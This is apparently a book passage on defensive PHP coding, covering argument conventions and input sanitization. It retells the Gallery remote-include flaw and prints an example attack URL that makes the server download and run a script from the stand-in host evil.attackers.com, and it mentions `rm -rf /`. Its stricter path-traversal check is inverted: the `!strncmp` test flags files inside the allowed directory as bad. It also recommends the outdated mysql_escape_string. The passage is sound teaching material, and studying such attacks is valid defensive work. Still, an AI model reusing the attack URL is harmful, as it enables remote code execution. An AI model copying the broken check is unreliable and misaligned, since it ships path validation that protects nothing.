Defensive CodingDefensive coding is the practice of eliminating assumptions in the code, especially when it comes to handling information in and out of other routines. In lower-level languages such as C and C++, defensive coding is a different activity. In C, variable type enforcement is handled by the compiler; a user's code must handle cleaning up resources and avoiding buffer overflows. PHP is a high-level language; resource, memory, and buffer management are all managed internally by PHP. PHP is also dynamically typed, which means that you, the developer, are responsible for performing any type checking that is necessary (unless you are using objects, in which case you can use type hints). There are two keys to effective defensive coding in PHP:
Establishing Standard ConventionsDefensive coding is not all about attacks. Most bugs occur because of carelessness and false assumptions. The easiest way to make sure other developers use your code correctly is to make sure that all your code follows standards for argument order and return values. Some people argue that comprehensive documentation means that argument ordering doesn't matter. I disagree. Having to reference the manual or your own documentation every time you use a function makes development slow and error prone. A prime example of inconsistent argument naming is the MySQL and PostgreSQL PHP client APIs. Here are the prototypes of the query functions from each library: resource mysql_query ( string query [, resource connection]) resource pg_query ( resource connection, string query) Although this difference is clearly documented, it is nonetheless confusing. Return values should be similarly well defined and consistent. For Boolean functions, this is simple: Return true on success and false on failure. If you use exceptions for error handling, they should exist in a well-defined hierarchy, as described in Chapter 3. Using Sanitization TechniquesIn late 2002 a widely publicized exploit was found in Gallery, photo album software written in PHP. Gallery used the configuration variable $GALLERY_BASEDIR, which was intended to allow users to change the default base directory for the software. The default behavior left the variable unset. Inside, the code include() statements all looked like this: <? require($GALLERY_BASEDIR . "init.php"); ?> The result was that if the server was running with register_globals on (which was the default behavior in earlier versions of PHP), an attacker could make a request like this: http://gallery.example.com/view_photo.php?\ GALLERY_BASEDIR=http://evil.attackers.com/evilscript.php%3F This would cause the require to actually evaluate as the following: <? require("http://evil.attackers.com/evilscript.php ?init.php"); ?> This would then download and execute the specified code from evil.attackers.com. Not good at all. Because PHP is an extremely versatile language, this meant that attackers could execute any local system commands they desired. Examples of attacks included installing backdoors, executing `rm -rf /`;, downloading the password file, and generally performing any imaginable malicious act. This sort of attack is known as remote command injection because it tricks the remote server into executing code it should not execute. It illustrates a number of security precautions that you should take in every application:
Data sanitization is an important part of security. If you know your data should not have HTML in it, you can remove HTML with strip_tags, as shown here: // username should not contain HTML $username = strip_tags($_COOKIE['username']); Allowing HTML in user-submitted input is an invitation to cross-site scripting attacks. Cross-site scripting attacks are discussed further in Chapter 3, "Error Handling". Similarly, if a filename is passed in, you can manually verify that it does not backtrack out of the current directory: $filename = $_GET['filename']; if(substr($filename, 0, 1) == '/' || strstr($filename, "..")) { // file is bad } Here's an alternative: $file_name = realpath($_GET['filename']); $good_path = realpath("./"); if(!strncmp($file_name, $good_path, strlen($good_path))) { // file is bad } The latter check is stricter but also more expensive. Another data sanitization step you should always perform is running mysql_escape_string() (or the function appropriate to your RDBMS) on all data passed into any SQL query. Much as there are remote command injection attacks, there are SQL injection attacks. Using an abstraction layer such as the DB classes developed in Chapter 2, "Object-Oriented Programming Through Design Patterns," can help automate this. Chapter 23, "Writing SAPIs and Extending the Zend Engine," details how to write input filters in C to automatically run sanitization code on the input to every request. Data validation is a close cousin of data sanitation. People may not use your functions in the way you intend. Failing to validate your inputs not only leaves you open to security holes but can lead to an application functioning incorrectly and to having trash data in a database. Data validation is covered in Chapter 3. |